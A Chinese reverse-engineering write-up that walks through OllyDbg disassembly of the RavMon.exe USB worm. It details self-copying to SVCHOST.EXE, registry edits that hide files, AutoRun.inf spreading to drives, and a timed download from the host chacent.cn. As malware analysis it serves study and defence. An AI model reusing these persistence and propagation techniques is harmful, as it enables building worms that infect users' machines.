【文章作者】:  newjueqi  
【作者邮箱】: zengjiansheng1@126.com
【作者QQ号】: 190678908
【使用工具】: OD
【加壳方式】: 未知壳
【操作平台】: XP-SP2
【作者声明】: 本文是站在petnt大侠肩膀上的成果^-^。petnt大侠发表了“简单病毒RavMon.exe的分析”( http://bbs.pediy.com/showthread.php?t=76310),文中没有给出详细的代码分析,本人尝试分析这个病毒,把结果写成文章,当作是petnt大侠文章的补充。失误之处敬请诸位大侠赐教!

用peid查看了RavMon.exe文件,显示结果为:Nothing found [Overlay] * ,没关系,这个病毒可以带壳调试,本人也懒得脱壳 ^-^

004141B0 >  833D 484E4100 0>cmp     dword ptr [414E48], 0  ;入口地址
004141B7    75 05           jnz     short 004141BE
004141B9    E9 01000000     jmp     004141BF
004141BE    C3              retn
004141BF    E8 46000000     call    0041420A
004141C4    E8 73000000     call    0041423C
004141C9    B8 B0414100     mov     eax, offset <模块入口点>
004141CE    2B05 084E4100   sub     eax, dword ptr [414E08]
004141D4    A3 444E4100     mov     dword ptr [414E44], eax
004141D9    E8 9C000000     call    0041427A
004141DE    E8 1A020000     call    004143FD
004141E3    E8 CA060000     call    004148B2
004141E8    E8 19060000     call    00414806
004141ED    A1 444E4100     mov     eax, dword ptr [414E44]
004141F2    C705 484E4100 0>mov     dword ptr [414E48], 1
004141FC    0105 004E4100   add     dword ptr [414E00], eax
00414202    FF35 004E4100   push    dword ptr [414E00]
00414208    C3              retn   ;这就是壳的出口

004038BB      6A            db      6A                 ;  CHAR 'j'
004038BC   .  60            pushad
004038BD   ?  68 C0954000   push    004095C0
004038C2   ?  E8 81030000   call    00403C48
004038C7   ?  BF 94000000   mov     edi, 94
004038CC   ?  8BC7          mov     eax, edi
004038CE   ?  E8 CD1E0000   call    004057A0
004038D3      89            db      89
004038D4      65            db      65                  ;  CHAR 'e'
004038D5      E8            db      E8
004038BB   .  6A 60         push    60
004038BD   .  68 C0954000   push    004095C0
004038C2   .  E8 81030000   call    00403C48
004038C7   .  BF 94000000   mov     edi, 94
004038CC   .  8BC7          mov     eax, edi
004038CE   .  E8 CD1E0000   call    004057A0
00403A41   .  E8 6ADBFFFF   call    004015B0   ;这是关键call,跟进去

004015B0  /$  81EC 90020000 sub     esp, 290
004015B6  |.  A1 88B04000   mov     eax, dword ptr [40B088>
004015BB  |.  53            push    ebx
004015BC  |.  55            push    ebp
004015BD  |.  56            push    esi
004015BE  |.  57            push    edi
004015BF  |.  68 FF000000   push    0FF                    ; /BufSize = FF (255.)
004015C4  |.  68 58B84000   push    0040B858               ; |PathBuffer = RavMon.0040B858
004015C9  |.  33DB          xor     ebx, ebx               ; |
004015CB  |.  53            push    ebx                    ; |hModule => NULL
004015CC  |.  898424 A80200>mov     dword ptr [esp+2A8], e>; |
004015D3  |.  33ED          xor     ebp, ebp               ; |
004015D5  |.  FF15 40904000 call    dword ptr [409040]     ; \GetModuleFileNameA;文件的完整路径存储

004015DB  |.  68 04010000   push    104
004015E0  |.  68 58B84000   push    0040B858
004015E5  |.  68 60B94000   push    0040B960
004015EA  |.  E8 A11D0000   call    00403390 ;把文件完整路径存储在0040B960
004015EF  |.  6A 5C         push    5C
004015F1  |.  68 60B94000   push    0040B960
004015F6  |.  E8 651D0000   call    00403360              
004015FB  |.  8BF0          mov     esi, eax               ;  RavMon.0040B975
0040163A     |.  >add     esp, 8
0040163D     |>  >call    00402370 ;通过修改注册表实现系统将不再显示隐藏文件和扩展名

00402370     /$  >sub     esp, 8
00402373     |.  >push    ebx
00402374     |.  >mov     ebx, dword ptr [409004]    ;  ADVAPI32.RegCreateKeyExA
0040237A     |.  >push    esi
0040237B     |.  >push    edi
0040237C     |.  >push    0                          ; /pDisposition = NULL
0040237E     |.  >lea     eax, dword ptr [esp+10]    ; |
00402382     |.  >push    eax                        ; |pHandle
00402383     |.  >push    0                          ; |pSecurity = NULL
00402385     |.  >push    0F003F                     ; |Access = KEY_ALL_ACCESS
0040238A     |.  >push    0              ; |Options = REG_OPTION_NON_VOLATILE
0040238C     |.  >push    0                          ; |Class = NULL
0040238E     |.  >push    0                          ; |Reserved = 0
00402390     |.  >push    004094D8                   ; |Subkey = 

00402395     |.  >push    80000002                   ; |hKey = HKEY_LOCAL_MACHINE
0040239A     |.  >call    ebx                        ; \RegCreateKeyExA
0040239C     |.  >test    eax, eax
0040239E     |.  >mov     esi, dword ptr [40900C]    ;  ADVAPI32.RegSetValueExA
004023A4     |.  >mov     edi, dword ptr [409010]    ;  ADVAPI32.RegCloseKey
004023AA     |.  >jnz     short 004023DA
004023AC     |.  >mov     ecx, dword ptr [esp+C]
004023B0     |.  >push    004094C8                   ; /ValueName = "CheckedValue"
004023B5     |.  >push    ecx                        ; |hKey=6C
004023B6     |.  >call    dword ptr [409000]         ; \RegDeleteValueA,删除


004023BC     |.  >mov     edx, dword ptr [esp+C]
004023C0     |.  >push    4                          ; /BufSize = 4
004023C2     |.  >push    004094C4                   ; |Buffer = RavMon.004094C4
004023C7     |.  >push    1                          ; |ValueType = REG_SZ
004023C9     |.  >push    0                          ; |Reserved = 0
004023CB     |.  >push    004094C8                   ; |ValueName = "CheckedValue"
004023D0     |.  >push    edx                        ; |hKey
004023D1     |.  >call    esi                        ; \RegSetValueExA,新建一个CheckedValue,值为0
004023D3     |.  >mov     eax, dword ptr [esp+C]
004023D7     |.  >push    eax                        ; /hKey
004023D8     |.  >call    edi                        ; \RegCloseKey
004023DA     |>  >push    0
004023DC     |.  >lea     ecx, dword ptr [esp+10]
004023E0     |.  >push    ecx
004023E1     |.  >push    0
004023E3     |.  >push    20006
004023E8     |.  >push    0
004023EA     |.  >push    0
004023EC     |.  >push    0
004023EE     |.  >push    00409488                   ;  ASCII 

004023F3     |.  >push    80000001
004023F8     |.  >call    ebx                            ; \RegCreateKeyExA
004023FA     |.  >test    eax, eax                
004023FC     |.  >jnz     short 00402423  
004023FE     |.  >push    4
00402400     |.  >lea     edx, dword ptr [esp+14]
00402404     |.  >push    edx
00402405     |.  >push    4
00402407     |.  >push    eax
00402408     |.  >mov     eax, dword ptr [esp+1C]
0040240C     |.  >push    00409480                   ;  ASCII "Hidden"
00402411     |.  >push    eax
00402412     |.  >mov     dword ptr [esp+28], 2
0040241A     |.  >call    esi                         ; \RegSetValueExA
0040241C     |.  >mov     ecx, dword ptr [esp+C]
00402420     |.  >push    ecx
00402421     |.  >call    edi                        ;  ADVAPI32.RegCloseKey
 00402423     |>  >pop     edi
00402424     |.  >pop     esi
00402425     |.  >pop     ebx
00402426     |.  >add     esp, 8
00402429     \.  >retn

0040164D    |.  68 04010000   push    104                          ; /BufSize = 104 (260.)
00401652    |.  68 30B74000   push    0040B730                     ; |Buffer = RavMon.0040B730
00401657    |.  FF15 38904000 call    dword ptr [409038]           ; \GetWindowsDirectoryA
0040165D    |.  33C0          xor     eax, eax
0040165F    |.  90            nop
00401660    |>  8A88 30B74000 /mov     cl, byte ptr [eax+40B730] ;这段循环把Windows的目录路径复制

00401666    |.  888C04 940000>|mov     byte ptr [esp+eax+94], cl
0040166D    |.  40            |inc     eax
0040166E    |.  3ACB          |cmp     cl, bl
00401670    |.^ 75 EE         \jnz     short 00401660
00401672    |.  8DBC24 940000>lea     edi, dword ptr [esp+94] ;把堆栈里Windows的目录路径复制到edi
00401679    |.  4F            dec     edi
0040167A    |.  8D9B 00000000 lea     ebx, dword ptr [ebx]
004016AF                  |.  >mov     byte ptr [edi+C], cl
004016B2                     >call    00401B90   ;  检查系统路径是否合法
004016B7                  |.  >push    0040B858  ;
004016BC                  |.  >call    00401B90  ;  检查文件运行的路径是否合法
004016C1   |.  >add     esp, 8
004016C4   |.  >mov     esi, 0040B858
004016C9   |.  >lea     eax, dword ptr [esp+94]
004016D0   |>  >/mov     dl, byte ptr [eax]
004016D2   |.  >|mov     cl, dl
004016D4   |.  >|cmp     dl, byte ptr [esi]
004016D6   |.  >|jnz     short 004016F4  
004016D8   |.  >|cmp     cl, bl
004016DA   |.  >|je      short 004016F0
004016DC   |.  >|mov     dl, byte ptr [eax+1]
004016DF   |.  >|mov     cl, dl
004016E1   |.  >|cmp     dl, byte ptr [esi+1]
004016E4   |.  >|jnz     short 004016F4
004016E6   |.  >|add     eax, 2
004016E9   |.  >|add     esi, 2
004016EC   |.  >|cmp     cl, bl
004016EE   |.^ >\jnz     short 004016D0
004016F0   |>  >xor     eax, eax
004016F2   |.  >jmp     short 004016F9
004016F4   |>  >sbb     eax, eax
004016F6   |.  >sbb     eax, -1
004016F9   |>  >cmp     eax, ebx


004016FB                  |.  >push    00409280                   ; /IniFileName = "SVCHOST.INI"
00401700                  |.  >je      0040183C                   ; |
00401706                  |.  >mov     ebp, dword ptr [409034]    ; |kernel32.GetPrivateProfileStringA
0040170C                  |.  >push    14                         ; |BufSize = 14 (20.)
0040170E                  |.  >lea     eax, dword ptr [esp+78]    ; |
00401712                  |.  >push    eax                        ; |ReturnBuffer
00401713                  |.  >push    0040927C                   ; |Default = "100"
00401718                  |.  >push    00409274                   ; |Key = "version"
0040171D                  |.  >push    0040926C                   ; |Section = "INFO"
00401722                  |.  >call    ebp                        ; \GetPrivateProfileStringA,在SVCHOST.INI中获取病

00401724                  |.  >mov     edi, 00409268              ;  ASCII "104"
00401729                  |.  >lea     esi, dword ptr [esp+70]
0040172D                  |.  >mov     ecx, 4
00401732                  |.  >xor     eax, eax
00401734                  |.  >repe    cmps byte ptr es:[edi], by> ;把当前版本号和在SVCHOST.INI中获取的版

00401736                  |.  >je      short 0040173D
00401738                  |.  >sbb     eax, eax
0040173A                  |.  >sbb     eax, -1
0040173D                  |>  >cmp     eax, ebx
0040173F                  |.  >push    00409280                   ;  ASCII "SVCHOST.INI"
00401744                  |.  >push    14
00401746                  |.  >jl      short 00401779
00401748                  |.  >lea     ecx, dword ptr [esp+78]
0040174C                  |.  >push    ecx
0040174D                  |.  >push    00409260                ;  ASCII "default"
00401752                  |.  >push    0040925C                ;  ASCII "win"
00401757                  |.  >push    0040926C                ;  ASCII "INFO"
0040175C                  |.  >call    ebp    ;  kernel32.GetPrivateProfileStringA
0040175E                  |.  >lea     edx, dword ptr [esp+70]
00401762                  |.  >push    edx        ; Title = "VNJFVAKFSDBTMKLN"
00401763                  |.  >push    00409254              ; |Class = "SVCHOST"
00401768                  |.  >call    dword ptr [40917C]         ; \FindWindowA
0040176E                  |.  >test    eax, eax     ;检查窗口是否存在
00401770                  |.  >je      short 004017B9 ;不存在就跳走
00401772                  |>  >xor     eax, eax
00401774                  |.  >jmp     00401A21   ;跳到强行结束进程的函数调用
00401779                  |>  >lea     eax, dword ptr [esp+78] ;如果检测到版本号不低就跳到这里
0040177D                  |.  >push    eax
0040177E                  |.  >push    00409260                   ;  ASCII "default"
00401783                  |.  >push    0040925C                   ;  ASCII "win"
00401788                  |.  >push    0040926C                   ;  ASCII "INFO"
0040178D                  |.  >call    ebp
0040178F                  |.  >lea     ecx, dword ptr [esp+70]
00401793                  |.  >push    ecx                        ; /Title
00401794                  |.  >push    00409254                   ; |Class = "SVCHOST"
00401799                  |.  >call    dword ptr [40917C]         ; \FindWindowA
0040179F                  |.  >cmp     eax, ebx                ;发现窗口存在就退出
004017A1                  |.  >je      short 004017B9
004017A3                  |.  >push    ebx                        ; /lParam
004017A4                  |.  >push    ebx                        ; |wParam
004017A5                  |.  >push    12                         ; |Message = WM_QUIT
004017A7                  |.  >push    eax                        ; |hWnd
004017A8                  |.  >call    dword ptr [409178]         ; \PostMessageA
004017AE                  |.  >push    3E8                        ; /Timeout = 1000. ms
004017B3                  |.  >call    dword ptr [409030]         ; \Sleep
004017B9                  |>  >mov     esi, dword ptr [40902C]    ;  kernel32.SetFileAttributesA
004017BF                  |.  >push    80                         ; /FileAttributes = NORMAL
004017C4                  |.  >lea     edx, dword ptr [esp+98]    ; |
004017CB   |.  >push    edx                           ; |FileName = "C:\WINDOWS\SVCHOST.EXE"
 004017CC                  |.  >call    esi                        ; \SetFileAttributesA,设置系统目录里文件属性,执行

004017CE                  |.  >push    ebx                        ; /FailIfExists
004017CF                  |.  >lea     eax, dword ptr [esp+98]    ; |
004017D6                  |.  >push    eax                        ; |NewFileName
004017D7                  |.  >push    0040B858                   ; |ExistingFileName = "D:\我的文档\",D7,"烂

004017DC                  |.  >call    dword ptr [409028]         ; \CopyFileA,把病毒文件复制到系统目录
004017E2                  |.  >push    7                          ; /FileAttributes = READONLY|HIDDEN|SYSTEM
004017E4                  |.  >lea     ecx, dword ptr [esp+98]    ; |
004017EB   |.  >push    ecx                           ; |FileName = "C:\WINDOWS\SVCHOST.EXE"
 004017EC                  |.  >call    esi                        ; \SetFileAttributesA,设置SVCHOST.EXE属性为只读

004017EE                  |.  >xor     eax, eax
004017F0                  |.  >mov     ecx, 11
004017F5                  |.  >lea     edi, dword ptr [esp+10]
004017F9                  |.  >rep     stos dword ptr es:[edi]
004017FB                  |.  >lea     edx, dword ptr [esp+84]
00401802                  |.  >push    edx                        ; /pProcessInfo
00401803                  |.  >lea     eax, dword ptr [esp+14]    ; |
00401807                  |.  >push    eax                        ; |pStartupInfo
00401808                  |.  >push    ebx                        ; |CurrentDir
00401809                  |.  >push    ebx                        ; |pEnvironment
0040180A                  |.  >push    ebx                        ; |CreationFlags
0040180B                  |.  >push    ebx                        ; |InheritHandles
0040180C                  |.  >push    ebx                        ; |pThreadSecurity
0040180D                  |.  >push    ebx                        ; |pProcessSecurity
0040180E                  |.  >push    ebx                        ; |CommandLine
0040180F                  |.  >lea     ecx, dword ptr [esp+B8]    ; |
00401816   |.  >push    ecx                           ; |ModuleFileName = "C:\WINDOWS\SVCHOST.EXE"
00401817                  |.  >call    dword ptr [4090C0]         ; \CreateProcessA,通过创建新线程来运行病毒

0040181D                  |.  >mov     edx, dword ptr [esp+88]
00401824                  |.  >mov     esi, dword ptr [4090B8]    ;  kernel32.CloseHandle
0040182A                  |.  >push    edx                        ; /hObject
0040182B                  |.  >call    esi                        ; \CloseHandle
0040182D                  |.  >mov     eax, dword ptr [esp+84]
00401834                  |.  >push    eax                        ; /hObject
00401835                  |.  >call    esi                        ; \CloseHandle
00401837                  |.  >jmp     00401A1C               ;退出

0040183C   |> \>push    11                            ; |BufSize = 11 (17.)
0040183E   |.  >lea     ecx, dword ptr [esp+78]       ; |
00401842   |.  >push    ecx                           ; |ReturnBuffer
00401843   |.  >push    00409260                      ; |Default = "default"
00401848   |.  >push    0040925C                      ; |Key = "win"
0040184D   |.  >push    0040926C                      ; |Section = "INFO"
00401852   |.  >call    dword ptr [409034]            ; \GetPrivateProfileStringA
00401858   |.  >lea     edx, dword ptr [esp+70]
0040185C   |.  >push    edx                           ; /Title = "HIMQWRQWOJDTJDRW"
0040185D   |.  >push    00409254                      ; |Class = "SVCHOST"
00401862   |.  >call    dword ptr [40917C]            ; \FindWindowA
00401868   |.  >test    eax, eax
0040186A   |.^ >jnz     00401772                    ;如果窗口存在就退出
004018A8               |.>push    7F00                                ; /RsrcName = IDI_APPLICATION
004018AD               |.>push    ebx                                 ; |hInst
004018AE               |.>mov     dword ptr [esp+8C], edx             ; |
004018B5               |.>mov     dword ptr [esp+90], eax             ; |
004018BC               |.>mov     dword ptr [esp+18], ebx             ; |
004018C0               |.>mov     dword ptr [esp+1C], 00401000        ; | 窗口过程地址
004018C8               |.>mov     dword ptr [esp+20], ebx             ; |
004018CC               |.>mov     dword ptr [esp+24], ebx             ; |
004018D0               |.>mov     dword ptr [esp+28], esi             ; |
004018D4               |.>call    dword ptr [409174]                  ; \LoadIconA
004018DA               |.>push    7F00                                ; /RsrcName = IDC_ARROW
004018DF               |.>push    ebx                                 ; |hInst
004018E0               |.>mov     dword ptr [esp+2C], eax             ; |
004018E4               |.>call    dword ptr [409170]                  ; \LoadCursorA
004018EA               |.>push    ebx                                 ; /ObjType
004018EB               |.>mov     dword ptr [esp+2C], eax             ; |
004018EF               |.>call    dword ptr [40901C]                  ; \GetStockObject
004018F5               |.>lea     edx, dword ptr [esp+10]
004018F9               |.>lea     ecx, dword ptr [esp+84]
00401900               |.>push    edx                                 ; /pWndClass
00401901               |.>mov     dword ptr [esp+30], eax             ; |
00401905               |.>mov     dword ptr [esp+34], ebx             ; |
00401909               |.>mov     dword ptr [esp+38], ecx             ; |
0040190D               |.>call    dword ptr [40916C]                  ; \RegisterClassA
00401952   |.  >push    00409280                      ; /FileName = "SVCHOST.INI"
00401957   |.  >push    00409268                      ; |String = "104"
0040195C   |.  >push    00409274                      ; |Key = "version"
00401961   |.  >push    0040926C                      ; |Section = "INFO"
00401966   |.  >call    esi                           ; \WritePrivateProfileStringA
00401968   |.  >push    00409280                      ; /FileName = "SVCHOST.INI"
0040196D   |.  >lea     edx, dword ptr [esp+74]       ; |
00401971   |.  >push    edx                           ; |String = "BTPDELA"
00401972   |.  >push    0040925C                      ; |Key = "win"
00401977   |.  >push    0040926C                      ; |Section = "INFO"
0040197C   |.  >call    esi                           ; \WritePrivateProfileStringA
004019C3   |.  >push    6                             ; /FileAttributes = HIDDEN|SYSTEM
004019C5   |.  >lea     ecx, dword ptr [esp+19C]      ; |
004019CC   |.  >mov     dword ptr [edi+8], edx        ; |
004019CF   |.  >push    ecx                           ; |FileName
004019D0   |.  >mov     byte ptr [edi+C], al          ; |
004019D3   |.  >call    dword ptr [40902C]            ; \SetFileAttributesA ;设置文件属性
004019D9   |.  >mov     esi, dword ptr [40915C]       ;  USER32.GetMessageA
004019DF   |.  >push    ebx                           ; /MsgFilterMax
004019E0   |.  >push    ebx                           ; |MsgFilterMin
004019E1   |.  >push    ebx                           ; |hWnd
004019E2   |.  >lea     edx, dword ptr [esp+60]       ; |
004019E6   |.  >push    edx                           ; |pMsg
004019E7   |.  >call    esi                           ; \GetMessageA
004019E9   |.  >test    eax, eax
004019EB   |.  >je      short 00401A1C
004019ED   |.  >mov     edi, dword ptr [409158]       ;  USER32.TranslateMessage ;
004019F3   |.  >mov     ebp, dword ptr [409154]       ;  USER32.DispatchMessageA

00401042                >>xor     eax, eax                     ;  Case 1 (WM_CREATE) of switch 0040101B
00401044                .>mov     dword ptr [40B720], eax
00401049                .>mov     dword ptr [40B724], eax
0040104E                .>mov     dword ptr [40B728], eax
00401053                .>push    0040B720
00401058                .>mov     byte ptr [40B72C], al
0040105D                .>call    00401C00
00401062                .>push    0040B834                         ;  ASCII 

00401067                .>push    0040B858
0040106C                .>call    004030D0    ;文件的校验
00401071                .>mov     esi, dword ptr [esp+510]
00401078                .>mov     edi, dword ptr [409198]      ;  USER32.SetTimer
0040107E                .>add     esp, 0C
00401081                .>push    0                            ; /Timerproc = NULL
00401083                .>push    7530                         ; |Timeout = 30000. ms
00401088                .>push    1                            ; |TimerID = 1
0040108A                .>push    esi                          ; |hWnd
0040108B                .>call    edi                          ; \SetTimer,定时器1,感染各个盘
0040108D                .>push    0                            ; /Timerproc = NULL
0040108F                .>push    493E0                        ; |Timeout = 300000. ms
00401094                .>push    2                            ; |TimerID = 2
00401096                .>push    esi                          ; |hWnd
00401097                .>call    edi                          ; \SetTimer ;定时器2,在网上下载文件
00401099                .>call    00402370                    ;通过修改注册表实现系统将不再显示隐藏文件和扩展名

0040109E         >>mov     eax, dword ptr [esp+50C]     ;  Case 113 (WM_TIMER) of switch 0040101B

004010B3         .>mov     ecx, dword ptr [409234]      ;  Case 2 of switch 004010A5

00401118                .>push    eax                          ; /Buffer
00401119                .>and     ecx, 3                       ; |
0040111C                .>push    104                          ; |BufSize = 104 (260.)
00401121                .>rep     movs byte ptr es:[edi], byte>; |
00401123                .>call    dword ptr [409068]           ; \GetTempPathA
00401129                .>lea     ecx, dword ptr [esp+3F8]
00401130                .>push    ecx                          ; /TempName
00401131                .>push    0                            ; |Unique = 0
00401133                .>push    0                            ; |Prefix = NULL
00401135                .>mov     edx, ecx                     ; |
00401137                .>push    edx                          ; |Path
00401138                .>call    dword ptr [4090B4]           ; \GetTempFileNameA
0040113E                .>lea     eax, dword ptr [esp+3F8]
00401145                .>push    eax
00401146                .>lea     ecx, dword ptr [esp+24]
0040114A                .>push    ecx
0040114B                .>push    00409228                     ;  ASCII "chacent.cn"
00401150                .>call    00402010           ;在“chacent.cn”上下载一个文件,应该是木马

00401380         >>lea     ebx, dword ptr [esp+28C]   ;  Case 1 of switch 004010A5
00401387         .>mov     ecx, ebx
00401389         .>push    ecx                        ; /Buffer
0040138A         .>push    68                         ; |BufSize = 68 (104.)
0040138C         .>call    dword ptr [4090C8]         ; \GetLogicalDriveStringsA

00401380         >>lea     ebx, dword ptr [esp+28C]   ;  Case 1 of switch 004010A5
00401387         .>mov     ecx, ebx
00401389         .>push    ecx                        ; /Buffer
0040138A         .>push    68                         ; |BufSize = 68 (104.)
0040138C         .>call    dword ptr [4090C8]         ; \GetLogicalDriveStringsA
00401392         .>mov     edi, 00409211
00401397         .>mov     esi, ebx
00401399         .>mov     ecx, 1
0040139E         .>xor     edx, edx
004013A0         .>repe    cmps byte ptr es:[edi], by>
004013A2         .>je      short 00401406
004013A4         .>mov     ebp, dword ptr [4090D0]    ;  kernel32.GetDriveTypeA
004013AA         .>lea     ebx, dword ptr [ebx]
004013B0         >>push    ebx
004013B1         .>call    ebp
004013B3         .>cmp     eax, 2
004013B6         .>je      short 004013BD
004013B8         .>cmp     eax, 3
004013BB         .>jnz     short 004013E2
004013BD         >>push    0040B834                   ;  ASCII "385323ccdc790b3302b32120ef1dbe9a"
004013C2         .>push    0040B040                   ;  ASCII "b69e4b47aa79ec1edeb98f5275ded52d"
004013C7         .>push    ebx
004013C8         .>call    00401E80
004013CD         .>add     esp, 0C
004013D0         .>test    eax, eax
004013D2         .>jnz     short 004013E2
004013D4         .>push    0040B858
004013D9         .>push    ebx
004013DA         .>call    00401CE0                    ;把病毒文件复制到U盘,并生成AutoRun.inf文件使U盘的


00401CE0        /$>sub     esp, 20C
00401CE6        |.>mov     eax, dword ptr [40B088]
00401CEB        |.>push    esi
00401CEC        |.>mov     dword ptr [esp+20C], eax
00401CF3        |.>mov     eax, dword ptr [esp+214]
00401CFA        |.>lea     esi, dword ptr [esp+4]
00401CFE        |.>push    edi
00401CFF        |.>mov     ecx, eax
00401D01        |.>sub     esi, eax
00401D03        |>>/mov     dl, byte ptr [ecx]
00401D05        |.>|mov     byte ptr [esi+ecx], dl
00401D08        |.>|inc     ecx
00401D09        |.>|test    dl, dl
00401D0B        |.>\jnz     short 00401D03
00401D0D        |.>lea     edx, dword ptr [esp+10C]
00401D14        |.>sub     edx, eax
00401D16        |>>/mov     cl, byte ptr [eax]
00401D18        |.>|mov     byte ptr [edx+eax], cl
00401D1B        |.>|inc     eax
00401D1C        |.>|test    cl, cl
00401D1E        |.>\jnz     short 00401D16
00401D20        |.>lea     edi, dword ptr [esp+8]
00401D24        |.>dec     edi
00401D25        |>>/mov     al, byte ptr [edi+1]
00401D28        |.>|inc     edi
00401D29        |.>|test    al, al
00401D2B        |.>\jnz     short 00401D25
00401D2D        |.>mov     eax, dword ptr [4093B8]
00401D32        |.>mov     ecx, dword ptr [4093BC]
00401D38        |.>mov     edx, dword ptr [4093C0]
00401D3E        |.>mov     dword ptr [edi], eax
00401D40        |.>mov     dword ptr [edi+4], ecx
00401D43        |.>mov     dword ptr [edi+8], edx
00401D46        |.>lea     edi, dword ptr [esp+10C]
00401D4D        |.>dec     edi
00401D4E        |.>mov     edi, edi
00401D50        |>>/mov     al, byte ptr [edi+1]
00401D53        |.>|inc     edi
00401D54        |.>|test    al, al
00401D56        |.>\jnz     short 00401D50
00401D58        |.>mov     eax, dword ptr [4093AC]
00401D5D        |.>mov     ecx, dword ptr [4093B0]
00401D63        |.>mov     dx, word ptr [4093B4]
00401D6A        |.>mov     dword ptr [edi], eax
00401D6C        |.>mov     al, byte ptr [4093B6]
00401D71        |.>mov     dword ptr [edi+4], ecx
00401D74        |.>mov     word ptr [edi+8], dx
00401D78        |.>push    80                          ; /FileAttributes = NORMAL
00401D7D        |.>lea     ecx, dword ptr [esp+C]                       ; |
00401D81        |.>mov     byte ptr [edi+A], al                         ; |
00401D84        |.>mov     edi, dword ptr [40902C]                      ; |kernel32.SetFileAttributesA
00401D8A        |.>push    ecx                          ; |FileName
00401D8B        |.>call    edi                            ; \SetFileAttributesA
00401D8D        |.>push    0                            ; /hTemplateFile = NULL
00401D8F        |.>push    6               ; |Attributes = HIDDEN|SYSTEM
00401D91        |.>push    2               ; |Mode = CREATE_ALWAYS
00401D93        |.>push    0                             ; |pSecurity = NULL
00401D95        |.>push    0                             ; |ShareMode = 0
00401D97        |.>push    40000000                   ; |Access = GENERIC_WRITE
00401D9C        |.>lea     edx, dword ptr [esp+20]                      ; |
00401DA0        |.>push    edx                             ; |FileName
00401DA1        |.>call    dword ptr [4090B0]                 ; \CreateFileA
00401DA7        |.>cmp     eax, -1
00401DAA        |.>je      00401E67
00401DB0        |.>push    eax                               ; /hObject
00401DB1        |.>call    dword ptr [4090B8]                   ; \CloseHandle
00401DB7        |.>mov     esi, dword ptr [409024]                      ;  kernel32.WritePrivateProfileStringA
00401DBD        |.>lea     eax, dword ptr [esp+8]
00401DC1        |.>push    eax                                ; /FileName
00401DC2        |.>push    004093AC                      ; |String = "RavMon.exe"
00401DC7        |.>push    00409200                       ; |Key = "open"
00401DCC        |.>push    004093A4                      ; |Section = "AutoRun"
00401DD1        |.>call    esi                           ; \WritePrivateProfileStringA
00401DD3        |.>lea     ecx, dword ptr [esp+8]
00401DD7        |.>push    ecx                           ; /FileName
00401DD8        |.>push    00409398                                     
00401DDD        |.>push    0040938C                     ; |Key = "shell\open"
00401DE2        |.>push    004093A4                      ; |Section = "AutoRun"
00401DE7        |.>call    esi                       ; \WritePrivateProfileStringA
00401DE9        |.>lea     edx, dword ptr [esp+8]
00401DED        |.>push    edx                      ; /FileName
00401DEE        |.>push    004093AC                 ; |String = "RavMon.exe"
00401DF3        |.>push    00409378                  ; |Key = "shell\open\Command"
00401DF8        |.>push    004093A4                  ; |Section = "AutoRun"
00401DFD        |.>call    esi                   ; \WritePrivateProfileStringA
00401DFF        |.>lea     eax, dword ptr [esp+8]
00401E03        |.>push    eax                          ; /FileName
00401E04        |.>push    00409368                                     00401E09        |.>push    00409358             

; |Key = "shell\explore"
00401E0E        |.>push    004093A4              ; |Section = "AutoRun"
00401E13        |.>call    esi                     ; \WritePrivateProfileStringA
00401E15        |.>lea     ecx, dword ptr [esp+8]
00401E19        |.>push    ecx                    ; /FileName
00401E1A        |.>push    00409348               ; |String = """RavMon.exe -e"""
00401E1F        |.>push    00409330                ; |Key = "shell\explore\Command"
00401E24        |.>push    004093A4                 ; |Section = "AutoRun"
00401E29        |.>call    esi                      ; \WritePrivateProfileStringA
00401E2B        |.>push    7                                            ; /FileAttributes = READONLY|HIDDEN|SYSTEM
00401E2D        |.>lea     edx, dword ptr [esp+C]                       ; |
00401E31        |.>push    edx                    ; |FileName
00401E32        |.>call    edi                      ; \SetFileAttributesA
00401E34        |.>push    80                     ; /FileAttributes = NORMAL
00401E39        |.>lea     eax, dword ptr [esp+110]                     ; |
00401E40        |.>push    eax                    ; |FileName
00401E41        |.>call    edi                     ; \SetFileAttributesA
00401E43        |.>mov     edx, dword ptr [esp+21C]
00401E4A        |.>push    0                    ; /FailIfExists = FALSE
00401E4C        |.>lea     ecx, dword ptr [esp+110]                     ; |
00401E53        |.>push    ecx                  ; |NewFileName
00401E54        |.>push    edx                   ; |ExistingFileName
00401E55        |.>call    dword ptr [409028]                           ; \CopyFileA
00401E5B        |.>push    7                                            ; /FileAttributes = READONLY|HIDDEN|SYSTEM
00401E5D        |.>lea     eax, dword ptr [esp+110]                     ; |
00401E64        |.>push    eax                         ; |FileName
00401E65        |.>call    edi                          ; \SetFileAttributesA
00401E67        |>>mov     ecx, dword ptr [esp+210]
00401E6E        |.>pop     edi
00401E6F        |.>pop     esi
00401E70        |.>call    00403279
00401E75        |.>add     esp, 20C
00401E7B        \.>retn
004013DF         .>add     esp, 8
004013E2         >>mov     eax, ebx
004013E4         .>lea     edx, dword ptr [eax+1]
004013E7         >>mov     cl, byte ptr [eax]
004013E9         .>inc     eax
004013EA         .>test    cl, cl
004013EC         .>jnz     short 004013E7
004013EE         .>sub     eax, edx
004013F0         .>lea     ebx, dword ptr [ebx+eax+1]
004013F4         .>mov     edi, 00409211
004013F9         .>mov     esi, ebx
004013FB         .>mov     ecx, 1
00401400         .>xor     eax, eax
00401402         .>repe    cmps byte ptr es:[edi], by>
00401404         .>jnz     short 004013B0
00401406         >>call    00402370             ;通过修改注册表实现系统将不再显示隐藏文件和扩展名
0040140B         .>xor     eax, eax
0040140D         .>lea     ecx, dword ptr [ecx]
00401410         >>mov     cl, byte ptr [eax+40B730]
00401416         .>mov     byte ptr [esp+eax+2F4], cl
0040141D         .>inc     eax
0040141E         .>test    cl, cl
00401420         .>jnz     short 00401410
00401422         .>lea     edi, dword ptr [esp+2F4]
00401429         .>dec     edi
0040142A         .>lea     ebx, dword ptr [ebx]
00401430         >>mov     al, byte ptr [edi+1]
00401433         .>inc     edi
00401434         .>test    al, al
00401436         .>jnz     short 00401430
00401438         .>mov     ecx, dword ptr [409208]
0040143E         .>mov     edx, dword ptr [40920C]
00401444         .>mov     al, byte ptr [409210]
00401449         .>mov     dword ptr [edi], ecx
0040144B         .>mov     dword ptr [edi+4], edx
0040144E         .>lea     ecx, dword ptr [esp+7C]
00401452         .>push    ecx
00401453         .>lea     edx, dword ptr [esp+2F8]
0040145A         .>push    edx
0040145B         .>mov     byte ptr [edi+8], al
0040145E         .>call    004030D0                   ;把病毒文件复制到本地硬盘
00401463         .>add     esp, 8
00401466         .>test    eax, eax
00401468         .>je      short 004014A4
0040146A         .>mov     esi, 0040B064             
0040146F         .>lea     eax, dword ptr [esp+7C]
